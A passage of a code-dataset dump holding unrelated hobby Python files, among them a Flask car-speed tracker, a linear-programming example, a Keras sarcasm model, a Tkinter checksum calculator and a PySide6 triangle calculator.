carCascade.detectMultiScale(gray, 1.1, 13, 18, (24, 24)) \n for (_x, _y, _w, _h) in cars:\n x = int(_x)\n y = int(_y)\n w = int(_w)\n h = int(_h)\n\n x_bar = x + 0.5 * w\n y_bar = y + 0.5 * h\n\n matchCarID = None \n for carID in carTracker.keys():\n trackedPosition = carTracker[carID].get_position()\n\n t_x = int(trackedPosition.left())\n t_y = int(trackedPosition.top())\n t_w = int(trackedPosition.width())\n t_h = int(trackedPosition.height())\n\n t_x_bar = t_x + 0.5 * t_w\n t_y_bar = t_y + 0.5 * t_h\n\n if ((t_x <= x_bar <= (t_x + t_w)) and (t_y <= y_bar <= (t_y + t_h)) and (x <= t_x_bar <= (x + w)) and (y <= t_y_bar <= (y + h))):\n matchCarID = carID\n if matchCarID is None:\n print(' Creating new tracker' + str(currentCarID))\n\n tracker = dlib.correlation_tracker()\n tracker.start_track(image, dlib.rectangle(x, y, x + w, y + h))\n\n carTracker[currentCarID] = tracker\n carLocation1[currentCarID] = [x, y, w, h]\n\n currentCarID = currentCarID + 1\n for carID in carTracker.keys():\n trackedPosition = carTracker[carID].get_position()\n\n t_x = int(trackedPosition.left())\n t_y = int(trackedPosition.top())\n t_w = int(trackedPosition.width())\n t_h = int(trackedPosition.height())\n\n cv2.rectangle(image, (t_x, t_y), (t_x + t_w, t_y + t_h), rectangleColor, 4)\n\n carLocation2[carID] = [t_x, t_y, t_w, t_h]\n end_time = time.time()\n if not (end_time == start_time):\n fps = 1.0/(end_time - start_time)\n for i in carLocation1.keys():\n if frameCounter % 1 == 0:\n [x1, y1, w1, h1] = carLocation1[i]\n [x2, y2, w2, h2] = carLocation2[i]\n\n carLocation1[i] = [x2, y2, w2, h2]\n if [x1, y1, w1, h1] != [x2, y2, w2, h2]:\n if (speed[i] == None or speed[i] == 0) and y1 >= 275 and y1 <= 285:\n speed[i] = estimateSpeed([x1, y1, w1, h1], [x1, y2, w2, h2])\n\n if speed[i] != None and y1 >= 180:\n cv2.putText(image, str(int(speed[i])) + \"km/h\", (int(x1 + w1/2), int(y1-5)), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 100) ,2)\n frame= cv2.imencode('.jpg',image)[1].tobytes()\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n\n # frame=camera.getframe()\n # yield(b'--frame\\r\\n'\n # b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame +\n # b'\\r\\n\\r\\n')\n\n@app.route('/video')\n\ndef video():\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\napp.run(debug=True)","repo_name":"ayushkr1701/speeddetectionflask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31414869496","text":"import pulp as pl\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\n# 定义产地、市场、产量和需求\r\nA = ['1', '2', '3']\r\nB = ['1', '2', '3', '4']\r\na = {'1': 500, '2': 600, '3': 250}\r\nb = {'1': 600, '2': 400, '3': 200, '4': 150}\r\n\r\n# 定义运费\r\nf = {'1': {'1': 20, '2': 10, '3': 12, '4': 16},\r\n '2': {'1': 22, '2': 9, '3': 9, '4': 18},\r\n '3': {'1': 23, '2': 13, '3': 10, '4': 25}}\r\n\r\n# 定义线性规划模型\r\nmodel = pl.LpProblem(\"Transportation\", pl.LpMinimize)\r\n\r\n# 定义决策变量\r\nx = pl.LpVariable.dicts(\"Route\", [(i, j) for i in A for j in B],\r\n lowBound=0, cat='Continuous')\r\n\r\n# 定义目标函数\r\nmodel += pl.lpSum([x[i, j]*f[i][j] for i in A for j in B]), \"Total Cost\"\r\n\r\n# 定义约束条件\r\nfor i in A:\r\n model += pl.lpSum([x[i, j] for j in B]) == a[i], \"Sum of Products %s\"%i\r\n\r\nfor j in B:\r\n model += pl.lpSum([x[i, j] for i in A]) == b[j], \"Sum of Demand %s\"%j\r\n\r\n# 求解线性规划问题\r\nmodel.solve()\r\n\r\n# 打印结果\r\nprint(\"Total Cost = \", pl.value(model.objective))\r\nfor i in A:\r\n for j in B:\r\n print(\"路线 %s -> %s 量为 %d\" % (i, j, x[i, j].varValue))\r\n\r\n# 构建有向图\r\nG = nx.DiGraph()\r\n\r\n# 添加节点\r\nfor i in A:\r\n for j in B:\r\n G.add_node(\"%s -> %s\" % (i, j))\r\n\r\n# 添加边\r\nfor i in A:\r\n for j in B:\r\n for k in A:\r\n for l in B:\r\n if x[i, j].varValue > 0 and (i, j) != (k, l):\r\n if i == k:\r\n G.add_edge(\"%s -> %s\" % (i, j), \"%s -> %s\" % (k, l),\r\n weight=f[i][j], label=str(int(x[i, j].varValue)))\r\n elif j == l:\r\n G.add_edge(\"%s -> %s\" % (i, j), \"%s -> %s\" % (k, l),\r\n weight=f[i][j], label=str(int(x[i, j].varValue)))\r\n\r\n# 绘制有向图\r\npos = nx.spring_layout(G, k=0.5)\r\nlabels = nx.get_edge_attributes(G, 'label')\r\nnx.draw_networkx(G, pos)\r\nnx.draw_networkx_edge_labels(G, pos, edge_labels=labels)\r\nplt.show()\r\n","repo_name":"Lixianlll/Graph-Neural-Networks","sub_path":"Graph-Neural-Networks/networkx搭建图网络.py","file_name":"networkx搭建图网络.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74735747572","text":"from Dataset import Dataset\nimport numpy as np\n\nimg_names = []\nimg_labels = []\nwith open('weather_val_labels.csv') as input_file:\n for line in input_file:\n (img_name, label) = line.split(',')\n img_names.append(img_name)\n img_labels.append(int(label))\n\nmean_pixel = np.load('train_mean_pixel.npy')\nstd_pixel = np.load('train_std_pixel.npy')\ndset = Dataset(img_names, img_labels, batch_size=8, shuffle=True, \n mean_pixel=mean_pixel, std_pixel=std_pixel)\ni = 0\nfor x, y in dset:\n print(x[0,0,0,0])\n print(x.shape)\n print(y.shape)\n print()\n i += 1\n if i >= 1000:\n break\n","repo_name":"BrettMeehan/CS231N_Final_Project","sub_path":"testDataset.py","file_name":"testDataset.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3487641881","text":"#\n# @lc app=leetcode.cn id=108 lang=python3\n#\n# [108] 将有序数组转换为二叉搜索树\n#\n# https://leetcode-cn.com/problems/convert-sorted-array-to-binary-search-tree/description/\n#\n# algorithms\n# Easy (63.90%)\n# Likes: 188\n# Dislikes: 0\n# Total Accepted: 20.7K\n# Total Submissions: 32.3K\n# Testcase Example: '[-10,-3,0,5,9]'\n#\n# 将一个按照升序排列的有序数组,转换为一棵高度平衡二叉搜索树。\n#\n# ��题中,一个高度平衡二叉树是指一个二叉树每个节点 的左右两个子树的高度差的绝对值不超过 1。\n#\n# 示例:\n#\n# 给定有序数组: [-10,-3,0,5,9],\n#\n# 一个可能的答案是:[0,-3,9,-10,null,5],它可以表示下面这个高度平衡二叉搜索树:\n#\n# ⁠ 0\n# ⁠ / \\\n# ⁠ -3 9\n# ⁠ / /\n# ⁠-10 5\n#\n#\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n\n mid = len(nums) // 2\n root = TreeNode(nums[mid])\n left = nums[:mid]\n right = nums[mid + 1 :]\n root.left = self.sortedArrayToBST(left)\n root.right = self.sortedArrayToBST(right)\n\n return root\n\n","repo_name":"Ehco1996/leetcode","sub_path":"backup/python/easy/108.将有序数组转换为二叉搜索树.py","file_name":"108.将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"12027186761","text":"import numpy\r\nimport scipy\r\nimport re\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport gensim\r\nimport keras\r\nfrom keras.models import Sequential, Model, load_model\r\nfrom keras.layers import Input,Concatenate\r\nfrom keras.layers import Reshape,Dense, Dropout, Embedding, LSTM,Flatten,Conv2D,MaxPooling2D\r\nfrom keras.optimizers import Adam\r\nimport csv\r\n\r\nTRAINING=1\r\nembedding_model=gensim.models.KeyedVectors.load_word2vec_format('E:/wordembedding/GoogleNews-vectors-negative300.bin', binary=True)\r\nesize=300\r\nsent_len=540\r\nbbatch=128\r\nmeta_batch=256\r\nmax_rounds=0\r\npretrain_rounds=2\r\n\r\ndef read_embedding(words,sent_len):\r\n X=[numpy.resize(numpy.array([embedding_model[word] for word in sent if word in embedding_model]),[sent_len,esize]) for sent in words]\r\n return X\r\n\r\ndef clean_up(s):\r\n global sent_len\r\n if(len(s[0])==2):\r\n y_=[[1-x[0],int(x[0])] for x in s]\r\n x_=[re.findall(r'[\\w]+',x[1]) for x in s]\r\n return numpy.array(read_embedding(x_,sent_len)).reshape((len(s),sent_len,esize,1)),y_\r\n else:\r\n y_=[[1-x[0],int(x[0])] for x in s]\r\n x_1=[re.findall(r'[\\w]+',x[1]) for x in s]\r\n x_2=[re.findall(r'[\\w]+',x[2]) for x in s]\r\n return (numpy.array(read_embedding(x_1,sent_len)).reshape((len(s),sent_len,esize,1)),\r\n numpy.array(read_embedding(x_2,sent_len)).reshape((len(s),sent_len,esize,1)),\r\n y_)\r\n\r\n\r\n\r\n\r\nif(TRAINING):\r\n model_input=Input(shape=(sent_len,esize,1),dtype='float32')\r\n add_input=Input(shape=(sent_len,esize,1),dtype='float32')\r\n conv_layer_1=Conv2D(256,(3,esize),activation='relu')\r\n conv_layer_2=Conv2D(256,(3,256),activation='relu')\r\n lstm_1=LSTM(256,activation='sigmoid',return_sequences=True)\r\n lstm_2=LSTM(256,activation='sigmoid')\r\n dropout=Dropout(0.5)\r\n dense_1=Dense(256,activation='sigmoid')\r\n left=conv_layer_1(model_input)\r\n left=Reshape((sent_len-2,256,1))(left)\r\n left=conv_layer_2(left)\r\n left=Reshape((sent_len-4,256))(left)\r\n left=lstm_1(left)\r\n left=lstm_2(left)\r\n left=dropout(left)\r\n left=dense_1(left)\r\n pretrain_out=Dense(2,activation='softmax')(left)\r\n\r\n right=conv_layer_1(add_input)\r\n right=Reshape((sent_len-2,256,1))(right)\r\n right=conv_layer_2(right)\r\n right=Reshape((sent_len-4,256))(right)\r\n right=lstm_1(right)\r\n right=lstm_2(right)\r\n right=dropout(right)\r\n right=dense_1(right)\r\n right=keras.layers.concatenate([left,right])\r\n real_out=Dense(2,activation='softmax')(right)\r\n\r\n if(os.path.exists('pretrain-deep-pre.h5')==False):\r\n model=Model(inputs=model_input,outputs=pretrain_out)\r\n model.compile(optimizer='rmsprop',loss='categorical_crossentropy')\r\n #dense_layer=Dense(256,activation='relu')\r\n \r\n\r\n #pre-train\r\n plt.ion()\r\n trds=0\r\n lloss=0.7\r\n disloss=0.7\r\n fsent=open('Sentiment.csv','r',encoding='utf-8')\r\n sentreader=csv.reader(fsent,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n ins=[]\r\n next(sentreader)\r\n for epoch in range(pretrain_rounds):\r\n for row in sentreader:\r\n ins.append([int(row[1]),row[3]])\r\n if(len(ins)>meta_batch):\r\n #print(\"pretending pretraining\")\r\n ins=clean_up(ins)\r\n history=model.fit(ins[0],ins[1],epochs=1,verbose=2,batch_size=bbatch,validation_split=0)\r\n disloss+=history.history['loss'][0]\r\n if(trds%20==19):\r\n disloss/=20\r\n plt.plot([trds//20,trds//20+1],[lloss,disloss],'b')\r\n lloss=disloss\r\n disloss=0\r\n plt.pause(0.05)\r\n trds+=1\r\n ins=[]\r\n fsent.seek(0)\r\n next(sentreader)\r\n plt.show()\r\n model.save('pretrain-deep-pre.h5')\r\n else:\r\n #train\r\n model=load_model('pretrain-deep-pre.h5')\r\n model=Model(inputs=[model_input,add_input],outputs=real_out)\r\n model.compile(optimizer='adam',loss='categorical_crossentropy')\r\n\r\n ins=[]\r\n test_x=[]\r\n test_y=[]\r\n ftrue=open(\"true_context.csv\",'r')\r\n ffalse=open(\"false_context.csv\",'r')\r\n treader=csv.reader(ftrue,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n freader=csv.reader(ffalse,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n\r\n ins=[]\r\n trials=0\r\n next(treader)\r\n next(freader)\r\n for i in range(bbatch//2):\r\n test_x.append(next(treader))\r\n test_x.append(next(freader))\r\n test_y.append(True)\r\n test_y.append(False)\r\n\r\n tests=[[test_y[i],test_x[i][0],test_x[i][1]] for i in range(len(test_x))]\r\n tests=clean_up(tests)\r\n\r\n tests_x_1=numpy.array(tests[0]).reshape([bbatch,sent_len,esize,1])\r\n tests_x_2=numpy.array(tests[1]).reshape([bbatch,sent_len,esize,1])\r\n tests_y=numpy.array(tests[2])\r\n trds=0\r\n lloss=0.7\r\n lacc=0.5\r\n lvacc=0.5\r\n lvloss=0.7\r\n for epoch in range(max_rounds):\r\n while(True):\r\n try:\r\n trues=next(treader)\r\n falses=next(freader)\r\n except:\r\n break\r\n ins.append([True,trues[0],trues[1]])\r\n ins.append([False,falses[0],falses[1]])\r\n if(len(ins)>=meta_batch):\r\n ins=clean_up(ins)\r\n #print(\"pretending training\")\r\n history=model.fit([ins[0],ins[1]],ins[2],epochs=1,verbose=2,batch_size=bbatch,validation_split=0)\r\n plt.plot([trds,trds+1],[lloss,history.history['loss'][0]],'r')\r\n lloss=history.history['loss'][0]\r\n plt.pause(0.05)\r\n ins=[]\r\n trds+=1\r\n ftrue.seek(0)\r\n ffalse.seek(0)\r\n next(treader)\r\n next(freader)\r\n for i in range(bbatch//2):\r\n next(treader)\r\n next(freader)\r\n plt.show()\r\n plt.savefig('pretrain-deep.jpg')\r\n model.save('pretrain-deep.h5')\r\nelse:\r\n total=0\r\n correct=0\r\n model=load_model('pretrain-deep.h5')\r\n ftest=open(\"test_context.csv\",'r')\r\n treader=csv.reader(ftest,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n while(True):\r\n try:\r\n row=next(treader)\r\n except:\r\n break\r\n ins=clean_up([[int(row[2]),row[0],row[1]]])\r\n ans=model.predict([ins[0],ins[1]])\r\n correct+=int(numpy.argmax(ans,axis=1)[0]==int(row[2]))\r\n total+=1\r\n\r\n #raise Exception\r\n\r\n print(float(correc)/float(total))\r\n #raise Exception\r\n","repo_name":"RikonYu/sarcasm","sub_path":"pretrain2.py","file_name":"pretrain2.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43295388991","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nfrom skimage.io import imsave\n\n__all__ = ['glue_focus', 'save_scaled_image']\n\n\ndef glue_focus(xyz, labels):\n \"\"\"\n Launch a glue session with focusing results.\n\n Parameters\n ----------\n xyz : `~numpy.ndarray`\n Matrix of (x, y, z) positions of particles\n labels : `~numpy.ndarray`\n Labels for particles assigned by clustering algorithm\n\n Returns\n -------\n ga : `~glue.app.qt.application.GlueApplication`\n Glue qt GUI application session\n \"\"\"\n from glue.core import DataCollection, Data\n from glue.app.qt.application import GlueApplication\n from glue_vispy_viewers.scatter.scatter_viewer import VispyScatterViewer\n\n data = Data(x=xyz[:, 0], y=xyz[:, 1], z=xyz[:, 2],\n clusters=labels, label='data')\n dc = DataCollection([data])\n\n # create a GUI session\n ga = GlueApplication(dc)\n scatter = ga.new_data_viewer(VispyScatterViewer)\n scatter.add_data(data)\n\n return ga\n\n\ndef save_scaled_image(image, filename, margin=100, blobs=None,\n min=0.01, max=99.99): #, min=0.05, max=99.95):\n \"\"\"\n Save an image to png.\n\n Parameters\n ----------\n image : `~numpy.ndarray`\n Image to save\n filename : str\n Path to where to save the png file\n blobs : list or `~numpy.ndarray` or `None`\n (x, y, z) positions\n margin : \n min : float\n Colormap scaling minimum\n max : float\n Colormap scaling maximum\n \"\"\"\n img_scaled = image.copy()\n\n if img_scaled.shape[0] > 1000:\n scale_margin = 200\n elif img_scaled.shape[0] > 500:\n scale_margin = 50\n elif img_scaled.shape[0] < 100:\n scale_margin = 0\n else:\n scale_margin = 10\n\n if img_scaled.shape[0] > 100:\n center_stamp = image[scale_margin:-scale_margin]\n img_scaled[np.percentile(center_stamp, min) > image] = np.percentile(center_stamp, min)\n img_scaled[np.percentile(center_stamp, max) < image] = np.percentile(center_stamp, max)\n\n img_scaled = ((img_scaled - img_scaled.min()) /\n (img_scaled.max()-img_scaled.min()))\n\n if blobs is not None:\n for blob in blobs:\n x, y = blob[0] + margin, blob[1] + margin\n lo = 10\n hi = 20\n thick = 2.0\n img_scaled[x+lo:x+hi, y-thick:y+thick] = 1.0\n img_scaled[x-thick:x+thick, y+lo:y+hi] = 1.0\n img_scaled[x-hi:x-lo, y-thick:y+thick] = 1.0\n img_scaled[x-thick:x+thick, y-hi:y-lo] = 1.0\n\n imsave(filename, img_scaled)\n\n","repo_name":"bmorris3/shampoo","sub_path":"shampoo/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"19424237531","text":"\r\nimport binascii\r\nimport tkinter as tk\r\nimport tkinter.filedialog\r\nimport hashlib\r\nfrom blake3 import blake3\r\nfrom tkinter import scrolledtext \r\n# import subprocess\r\n\r\nb2sum = \"\"\r\nfile = ''\r\ncodes = {}\r\ndef onFinish():\r\n pass\r\n\r\ndef findfile():\r\n global file\r\n file = tkinter.filedialog.askopenfilename()\r\n if file != '':\r\n b2.config(text = \"File in:\"+ file)\r\n start()\r\n else:\r\n b2.config(text = \"Please select a file\")\r\n \r\n# def blake2(alg):\r\n# global codes\r\n \r\n# alg = \"blake2\"+alg\r\n# cwd = os.getcwd()\r\n# tool = os.path.abspath(cwd + '/bin/b2sum-i686-windows.exe')\r\n\r\n# cmd = '\"'+ tool +'\"' + \" \"+\"-a \"+alg+\" \"+ '\"'+ os.path.abspath(file) + '\"'\r\n# if alg == \"blake23\":\r\n# alg = \"blake3\"\r\n# cmd = '\"'+os.path.abspath(cwd + '/bin/b3sum_windows_x64_bin.exe')+'\"' + ' ' + '\"'+ os.path.abspath(file) + '\"'\r\n\r\n\r\n# code = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE).stdout.readlines()\r\n# print(cmd)\r\n\r\n# try:\r\n# if code != []:\r\n# code = code[0].decode(\"utf-8\").split(\" \")[0]\r\n# except:\r\n# if code != []:\r\n# code = code[0].decode(\"gbk\").split(\" \")[0]\r\n# if code != []:\r\n# codes[alg] = code\r\n# else:\r\n# codes[alg] = \"error\" \r\n\r\ndef calHashForBigFile(a):\r\n global file\r\n if a == \"md5\":\r\n m = hashlib.md5()\r\n elif a == \"sha1\":\r\n m = hashlib.sha1()\r\n elif a == 'sha224':\r\n m = hashlib.sha224()\r\n elif a == 'sha256':\r\n m = hashlib.sha256()\r\n elif a == 'sha384':\r\n m = hashlib.sha384()\r\n elif a == 'hmac':\r\n m = hashlib.sha384()\r\n elif a == 'blake2b':\r\n m = hashlib.blake2b()\r\n elif a == 'blake2s':\r\n m = hashlib.blake2s()\r\n elif a == 'blake3':\r\n m = blake3()\r\n f = open(file, 'rb')\r\n buffer = 8192 # why is 8192 | 8192 is fast than 2048\r\n while 1:\r\n chunk = f.read(buffer)\r\n if not chunk : break\r\n m.update(chunk) \r\n f.close()\r\n return m.hexdigest()\r\ndef calcFileCRC(): \r\n global file\r\n try: \r\n blocksize = 1024 * 64 \r\n f = open(file,\"rb\") \r\n str = f.read(blocksize) \r\n crc = 0 \r\n while(len(str) != 0): \r\n crc = binascii.crc32(str, crc) \r\n str = f.read(blocksize) \r\n f.close() \r\n except: \r\n print('get file crc error!') \r\n return \"error\"\r\n return hex(crc)\r\ndef start():\r\n global codes\r\n codes = {}\r\n if blake2b.get() == 1:\r\n codes['blake2s'] = calHashForBigFile(\"blake2b\")\r\n if blake2s.get() == 1:\r\n codes['blake2b'] = calHashForBigFile(\"blake2s\")\r\n if blake2bp.get() == 1:\r\n codes['blake2bp'] = \"unsuport\"\r\n if blake2sp.get() == 1:\r\n # blake2(\"sp\")\r\n codes['blake2sp'] = \"unsuport\"\r\n if md5.get() == 1:\r\n codes['md5'] = calHashForBigFile('md5')\r\n if blake3i.get() == 1:\r\n codes['blake3'] = calHashForBigFile(\"blake3\")\r\n if crc32.get() == 1:\r\n codes['crc32'] = calcFileCRC()\r\n if hmac.get() == 1:\r\n codes['hmac'] = calHashForBigFile('hmac')\r\n if sha1.get() == 1:\r\n codes['sha1'] = calHashForBigFile('sha1')\r\n if sha224.get() == 1:\r\n codes['sha224'] = calHashForBigFile('sha224')\r\n if sha256.get() == 1:\r\n codes['sha256'] = calHashForBigFile('sha256')\r\n if sha384.get() == 1:\r\n codes['sha384'] = calHashForBigFile('sha384')\r\n text = \"\"\r\n for k in codes.keys():\r\n text = text +\"[ \" +k.upper()+\"\\t]\" + \"\\t\" + codes[k] + '\\n'\r\n b4.delete(1.0, tk.END)\r\n max_height = len(codes.keys()) + 3\r\n maxchar = max(len(l) for l in text.split('\\n'))\r\n max_width = max(60, min(144, maxchar - 20))\r\n b4.configure(width= max_width)\r\n b4.configure(height= max_height)\r\n b4.insert(tk.END,text)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n root = tk.Tk()\r\n root.title(\"File Checksum toolkit\")\r\n # root.iconbitmap(\"icon.ico\")\r\n b1 = tk.Label(root, text = '1.Choose system')\r\n b1.pack()\r\n sys_code = tk.IntVar()\r\n \r\n windows64_select = tk.Radiobutton(root, text='Windows amd64',value=1,variable=sys_code)\r\n windows86_select = tk.Radiobutton(root, text='Windows x86',value=2,variable=sys_code)\r\n windows64_select.pack()\r\n windows86_select.pack()\r\n b3 = tk.Label(root, text = '2.Choose Algrithom')\r\n b3.pack()\r\n frame1 = tk.Frame(root)\r\n frame2 = tk.Frame(root)\r\n frame3 = tk.Frame(root)\r\n blake2b = tk.IntVar()\r\n blake2s = tk.IntVar()\r\n blake2bp = tk.IntVar()\r\n blake2sp = tk.IntVar()\r\n C1 = tk.Checkbutton(frame1, text = \"blake2b\", variable = blake2b, onvalue = 1, offvalue = 0)\r\n C2 = tk.Checkbutton(frame1, text = \"blake2s\", variable = blake2s, onvalue = 1, offvalue = 0)\r\n C3 = tk.Checkbutton(frame1, text = \"blake2bp\", variable = blake2bp, onvalue = 1, offvalue = 0)\r\n C4 = tk.Checkbutton(frame1, text = \"blake2sp\", variable = blake2sp, onvalue = 1, offvalue = 0)\r\n\r\n md5 = tk.IntVar()\r\n blake3i = tk.IntVar()\r\n crc32 = tk.IntVar()\r\n hmac = tk.IntVar()\r\n C5 = tk.Checkbutton(frame2, text = \"md5\", variable = md5, onvalue = 1, offvalue = 0)\r\n C6 = tk.Checkbutton(frame2, text = \"blake3\", variable = blake3i, onvalue = 1, offvalue = 0)\r\n C7 = tk.Checkbutton(frame2, text = \"crc32\", variable = crc32, onvalue = 1, offvalue = 0)\r\n C8 = tk.Checkbutton(frame2, text = \"hmac\", variable = hmac, onvalue = 1, offvalue = 0)\r\n\r\n sha1 = tk.IntVar()\r\n sha224 = tk.IntVar()\r\n sha256 = tk.IntVar()\r\n sha384 = tk.IntVar()\r\n C9 = tk.Checkbutton(frame3, text = \"sha1\", variable = sha1, onvalue = 1, offvalue = 0)\r\n C10 = tk.Checkbutton(frame3, text = \"sha224\", variable = sha224, onvalue = 1, offvalue = 0)\r\n C11 = tk.Checkbutton(frame3, text = \"sha256\", variable = sha256, onvalue = 1, offvalue = 0)\r\n C12 = tk.Checkbutton(frame3, text = \"sha384\", variable = sha384, onvalue = 1, offvalue = 0)\r\n \r\n C1.pack(side=tk.LEFT)\r\n C2.pack(side=tk.LEFT)\r\n C3.pack(side=tk.LEFT)\r\n C4.pack(side=tk.LEFT)\r\n C5.pack(side=tk.LEFT)\r\n C6.pack(side=tk.LEFT)\r\n C7.pack(side=tk.LEFT)\r\n C8.pack(side=tk.LEFT)\r\n C9.pack(side=tk.LEFT)\r\n C10.pack(side=tk.LEFT)\r\n C11.pack(side=tk.LEFT)\r\n C12.pack(side=tk.LEFT)\r\n\r\n frame1.pack(side=tk.TOP)\r\n frame2.pack(side=tk.TOP)\r\n frame3.pack(side=tk.TOP)\r\n\r\n\r\n\r\n file_btn = tk.Button(root,text=\"3.Choose File And Calculate Checksum\",command=findfile)\r\n file_btn.pack()\r\n\r\n b2 = tk.Label(root, text = '')\r\n b2.pack()\r\n ptext = tk.StringVar()\r\n # check_btn = tk.Button(root,text=\"4.Calculate Checksum\",command=start)\r\n # check_btn.pack()\r\n b4 = scrolledtext.ScrolledText(root, bd=5 ,width = 60, height = 1, wrap=tk.WORD)\r\n b4.pack()\r\n \r\n onFinish()\r\n root.mainloop()","repo_name":"EthanBird/FileChecksumTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42007997952","text":"# [[file:02_QtDesigner.org::*Direkte indlæsning af designfil][Direkte indlæsning af designfil:1]]\n# Grafisk_trekantsberegner.py\nimport sys\n\nfrom PySide6.QtWidgets import QApplication\n# QUiLoader skal bruges til at loade ui-filen\nfrom PySide6.QtUiTools import QUiLoader\n\n# Læg mærke tile at QMainWindow ikke importeres.\n# I stedet importeres QObject i stedet for.\n# QMainWindow er anvendt i Designer.\nfrom PySide6.QtCore import QObject\n\n\n# loader-objekt som bruges til at loade .ui-filen\nloader = QUiLoader()\n\n\nclass Trekantsberegner(QObject):\n def __init__(self):\n super().__init__()\n # Brugerfladen kan tilgås gennem self.ui\n self.ui = loader.load(\"Grafisk_trekantsberegner_GUI.ui\", None)\n self.ui.beregnknap.clicked.connect(self.beregn)\n # Skal bruges til at gemme værdierne for vinklerne og sidelængderne\n self.trekantsvaerdier = {}\n\n def beregn(self):\n # Her er et eksempel, som skal vise, hvordan værdier kan gemmes\n # I skal bruge funktionen beregn til noget andet end dette eksempel\n # Gemmer alle vinkler og længder i et dictionary\n for noegle, stoerrelse in zip([\"A\", \"B\", \"C\", \"a\", \"b\", \"c\"],[self.ui.vinkel_A, self.ui.vinkel_B, self.ui.vinkel_C, self.ui.side_a, self.ui.side_b, self.ui.side_c]):\n self.trekantsvaerdier[noegle] = stoerrelse.value()\n\n # Alternativ til for-løkken. Hvis der er mange værdier, der skal gemmes,\n # kan det hurtigt fylde for mange linjer.\n # self.trekantsvaerdier[\"A\"] = self.ui.vinkel_A.value()\n # self.trekantsvaerdier[\"B\"] = self.ui.vinkel_B.value()\n # self.trekantsvaerdier[\"C\"] = self.ui.vinkel_C.value()\n # self.trekantsvaerdier[\"a\"] = self.ui.side_a.value()\n # self.trekantsvaerdier[\"b\"] = self.ui.side_b.value()\n # self.trekantsvaerdier[\"c\"] = self.ui.side_c.value()\n\n # Sletter indholdet i outputfeltet\n self.ui.outputfelt.clear()\n # Skriver følgende til outputfeltet\n self.ui.outputfelt.append(\"Følgende værdier er gemt.\")\n # Udprinter alle værdierne for indtastede vinkler og sider\n for navn, vaerdi in self.trekantsvaerdier.items():\n self.ui.outputfelt.append(f\"{navn} = {vaerdi}\")\n\n\nprogram = QApplication.instance()\nif program == None:\n program = QApplication(sys.argv)\ntrekantsberegner = Trekantsberegner()\ntrekantsberegner.ui.show()\nprogram.exec()\n# Direkte indlæsning af designfil:1 ends here\n","repo_name":"Vibenshus-Gymnasium-Programmering/PySide6_praesentationer","sub_path":"02_QtDesigner/Grafisk_trekantsberegner.py","file_name":"Grafisk_trekantsberegner.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35641752578","text":"import yfinance as yf\n\n\ndef get_tick(ticker):\n data = yf.Ticker(ticker).info\n return data\ndef getRSI(ticker):\n df = yf.download(ticker, period='1mo')\n period = 5\n delta = df['Close'].diff()\n gains = delta.where(delta > 0, 0)\n losses = -delta.where(delta < 0, 0)\n average_gain = gains.rolling(window=period).mean()\n average_loss = losses.rolling(window=period).mean()\n relative_strength = average_gain / average_loss\n\n relative_strength = average_gain / average_loss\n rsi = 100 - (100 / (1 + relative_strength))\n df['RSI'] = rsi\n df['RSI'].fillna(method='ffill', inplace=True)\n","repo_name":"james04nesbitt/Signal_Street","sub_path":"ss/finance.py","file_name":"finance.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72691272054","text":"#!/usr/bin/env python\nimport pygame.event\nimport pygame.key\nimport pygame.display\nimport pygame.image\nimport pygame.mixer\nfrom pygame.locals import *\nimport pygame\nimport sys\nimport time\nimport os\nimport dzulib1 as dzulib\nfrom dzulib1 import textrender\npygame.display.init()\nimport traceback\nimport random\nimport xml.etree.ElementTree as ET\npluglist=[]\n\n\ndef OKpop(info, extra=None, extra2=None):\n\tscreensurf=pygame.display.get_surface()\n\tbgrect=pygame.Rect(0, 0, screensurf.get_width()//1.8, 6*uitextsize)\n\tbgrect.centerx=(screensurf.get_width()//2)\n\tbgrect.centery=(screensurf.get_height()//2)\n\tpygame.draw.rect(screensurf, uibgcolor, bgrect)\n\tdzulib.trace3dbox(screensurf, uibgcolor, bgrect, 